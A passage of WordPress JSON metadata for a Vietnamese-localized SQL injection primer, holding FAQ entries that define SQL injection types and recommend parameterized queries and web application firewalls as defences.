detected?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. It inspects traffic for malicious activity and can block SQL injection attacks.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"position\":4,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103\",\"name\":\"What is second-order SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"position\":5,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267\",\"name\":\"What is blind SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"position\":6,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781\",\"name\":\"What is a stacked query?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"},{\"@type\":\"Question\",\"@id\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"position\":7,\"url\":\"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814\",\"name\":\"What is an error-based SQL injection?\",\"answerCount\":1,\"acceptedAnswer\":{\"@type\":\"Answer\",\"text\":\"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. This attack is more challenging to execute but can be very dangerous if successful.\",\"inLanguage\":\"vi\"},\"inLanguage\":\"vi\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SQLi l\u00e0 g\u00ec v\u00e0 C\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng | securitybriefing","description":"H\u1ecdc c\u00e1c ki\u1ebfn th\u1ee9c c\u01a1 b\u1ea3n v\u1ec1 SQL injection. SQL injection l\u00e0 g\u00ec, n\u00f3 ho\u1ea1t \u0111\u1ed9ng nh\u01b0 th\u1ebf n\u00e0o v\u00e0 nh\u1eefng c\u00e1ch n\u00e0o \u0111\u1ec3 b\u1ea3o v\u1ec7 trang web c\u1ee7a b\u1ea1n kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","og_locale":"vi_VN","og_type":"article","og_title":"What is SQLi and How to Prevent Attacks | securitybriefing","og_description":"Learn the basics of SQL injection. what is SQL injection, how does it work, and what ways to protect your site from attacks.","og_url":"https:\/\/securitybriefing.net\/vi\/bao-ve\/sql-injection-101-sqli-la-gi-va-cach-ngan-chan-cac-cuoc-tan-cong\/","og_site_name":"Security Briefing","article_published_time":"2022-08-06T22:53:54+00:00","og_image":[{"width":558,"height":500,"url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","type":"image\/png"}],"author":"security","twitter_card":"summary_large_image","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"security","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"11 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article","isPartOf":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"author":{"name":"security","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81"},"headline":"SQL Injection 101: What is SQLi and How to Prevent Attacks","datePublished":"2022-08-06T22:53:54+00:00","mainEntityOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"wordCount":2130,"publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","articleSection":["Security"],"inLanguage":"vi"},{"@type":["WebPage","FAQPage"],"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","name":"SQLi l\u00e0 g\u00ec v\u00e0 C\u00e1ch ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng | securitybriefing","isPartOf":{"@id":"https:\/\/securitybriefing.net\/#website"},"primaryImageOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","datePublished":"2022-08-06T22:53:54+00:00","description":"H\u1ecdc c\u00e1c ki\u1ebfn th\u1ee9c c\u01a1 b\u1ea3n v\u1ec1 SQL injection. SQL injection l\u00e0 g\u00ec, n\u00f3 ho\u1ea1t \u0111\u1ed9ng nh\u01b0 th\u1ebf n\u00e0o v\u00e0 nh\u1eefng c\u00e1ch n\u00e0o \u0111\u1ec3 b\u1ea3o v\u1ec7 trang web c\u1ee7a b\u1ea1n kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng.","breadcrumb":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb"},"mainEntity":[{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814"}],"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","width":558,"height":500,"caption":"sql injection"},{"@type":"BreadcrumbList","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/securitybriefing.net\/"},{"@type":"ListItem","position":2,"name":"SQL Injection 101: What is SQLi and How to Prevent Attacks"}]},{"@type":"WebSite","@id":"https:\/\/securitybriefing.net\/#website","url":"https:\/\/securitybriefing.net\/","name":"B\u00e1o C\u00e1o An Ninh","description":"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.","publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/securitybriefing.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/securitybriefing.net\/#organization","name":"B\u00e1o C\u00e1o An Ninh","url":"https:\/\/securitybriefing.net\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","width":256,"height":70,"caption":"Security Briefing"},"image":{"@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81","name":"b\u1ea3o v\u1ec7","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","caption":"security"},"description":"admin l\u00e0 m\u1ed9t bi\u00ean t\u1eadp vi\u00ean c\u1ea5p cao c\u1ee7a Government Technology. Tr\u01b0\u1edbc \u0111\u00e2y c\u00f4 \u0111\u00e3 vi\u1ebft cho PYMNTS v\u00e0 The Bay State Banner, v\u00e0 c\u00f3 b\u1eb1ng C\u1eed nh\u00e2n Ngh\u1ec7 thu\u1eadt s\u00e1ng t\u00e1c c\u1ee7a tr\u01b0\u1eddng Carnegie Mellon. C\u00f4 s\u1ed1ng \u1edf ngo\u1ea1i \u00f4 Boston.","sameAs":["http:\/\/securitybriefing.net"],"url":"https:\/\/securitybriefing.net\/vi\/author\/security\/"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","position":1,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","name":"SQL injection ph\u1ed5 bi\u1ebfn nh\u1ea5t l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker can use the same communication channel to deliver the payload and gather results.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","position":2,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","name":"Ph\u00f2ng th\u1ee7 t\u1ed1t nh\u1ea5t ch\u1ed1ng l\u1ea1i SQL injection l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"The best defense against SQL injection is to use parameterized queries. This type of query uses placeholder values for parameters, which are supplied at a later date. This method allows the database to identify between source code and information.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","position":3,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","name":"SQL injection \u0111\u01b0\u1ee3c ph\u00e1t hi\u1ec7n nh\u01b0 th\u1ebf n\u00e0o?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"SQL injection can be detected in several ways. One method is to use a web application firewall (WAF). A WAF is a piece of hardware or software that sits between a web application and the internet. It inspects traffic for malicious activity and can block SQL injection attacks.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","position":4,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","name":"SQL injection th\u1ee9 c\u1ea5p l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Second-order SQL injection occurs when an attacker can inject a payload that is stored by the web application and then later executed. This type of attack is more difficult to achieve because the attacker must have a way to trigger the execution of the stored payload.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","position":5,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","name":"Blind SQL injection l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they must use true or false statements to infer information from the database. This type of attack is more challenging to execute but can be just as dangerous as other types of SQL injection.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","position":6,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","name":"Truy v\u1ea5n x\u1ebfp ch\u1ed3ng l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"A stacked query is a type of SQL injection where the attacker uses multiple queries to extract information from the database. This type of attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"vi"},"inLanguage":"vi"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","position":7,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","name":"SQL injection d\u1ef1a tr\u00ean l\u1ed7i l\u00e0 g\u00ec?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Error-based SQL injection is an attack where the attacker uses database errors to infer information from the database. This attack is more challenging to execute but can be very dangerous if successful.","inLanguage":"vi"},"inLanguage":"vi"}]}},"_links":{"self":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts\/505","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/comments?post=505"}],"version-history":[{"count":0,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/posts\/505\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/media\/644"}],"wp:attachment":[{"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/media?parent=505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/categories?post=505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/securitybriefing.net\/vi\/wp-json\/wp\/v2\/tags?post=505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}